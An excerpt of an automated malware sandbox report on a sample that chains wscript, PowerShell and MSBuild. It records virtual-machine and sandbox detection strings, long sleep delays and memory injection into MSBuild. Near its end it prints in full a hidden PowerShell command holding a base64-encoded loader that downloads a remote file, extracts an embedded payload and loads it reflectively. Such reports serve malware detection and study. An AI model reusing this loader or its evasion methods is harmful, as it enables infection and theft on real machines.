              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4EA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4932Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4903Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7980Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488Thread sleep count: 2008 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488Thread sleep time: -2008000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488Thread sleep count: 7980 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488Thread sleep time: -7980000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !vmware virtual s scsi disk device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga
              Source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: powershell.exe, 00000002.00000002.1351076971.0000013DAC15E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware pointing device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware sata
              Source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachineDetector
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .metadata.xml!vmware virtual s scsi disk device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware vmci bus device
              Source: powershell.exe, 00000002.00000002.1351076971.0000013DAC130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWY
              Source: MSBuild.exe, 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware pointing device<Each value of the array must contain a valid file reference.
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware usb pointing device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware s
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarexD
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareArguments
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtools
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: MSBuild.exe, 0000000B.00000002.2442368097.0000000005390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
              Source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: virtualmachinedetector
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: amsi64_7776.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi64_7776.amsi.csv, type: OTHER
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 412000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C37008Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'jabjaggabwbuagqacgbvahmadabvag0ayqagad0aiaanacyazqa1aduamqa0aduamqa1agqaoqa3aduaoablageazgbhagiamqawadiangazagqaywa1adyaoaa1adcazgaxadcazqa4adgamgawagqaoqa0adaamqbkagyayqa2admaoqa5adqanqa2aguanaa1aguamgbjadianaawagiazaa9ag0aaaamadeazgaxadaaygawadganga9ahmaaqamadeanwazaduaywawadganga9ahgazqa/acmaeaajac4azqbsagkargbkaguaiwbyaguadgbuag8aqwavadmaoaa2aduamwayadiamwayadcaoaa5adyaoaa5adqangazadealwa1aduamgaxadcanqawaduamqa2adkanqa2adeamqa0aduamwaxac8acwajag4azqbtaggaywbhacmaiwbhac8abqbvagmalgbwahaayqbkahiabwbjahmaaqbkac4abgbkagmalwavadoacwbwacmaiwboaccaowakahaacgblahmaywbyagkaygbpag4azwagad0aiaakagmaaabvag4azabyag8acwb0ag8abqbhacaalqbyaguacabsageaywblacaajwajaccalaagaccadaanadsajabwahkacgbvagcabgbvahmadabpagmacwagad0aiaanaggadab0ahaacwa6ac8alwbhahiaywboagkadgblac4abwbyagcalwbkag8adwbuagwabwbhagqalwbuaguadwbfagkabqbhagcazqbfadiamaayaduamaa0adeamwavag4azqb3af8aaqbtageazwblac4aagbwagcajwa7acqabqblahiaywboageabgb0aguacgagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsajabtaguacgbjaggayqbuahqazqbyac4asablageazablahiacwauaeeazabkacgajwbvahmazqbyac0aqqbnaguabgb0accalaanae0abwb6agkababsagealwa1ac4ama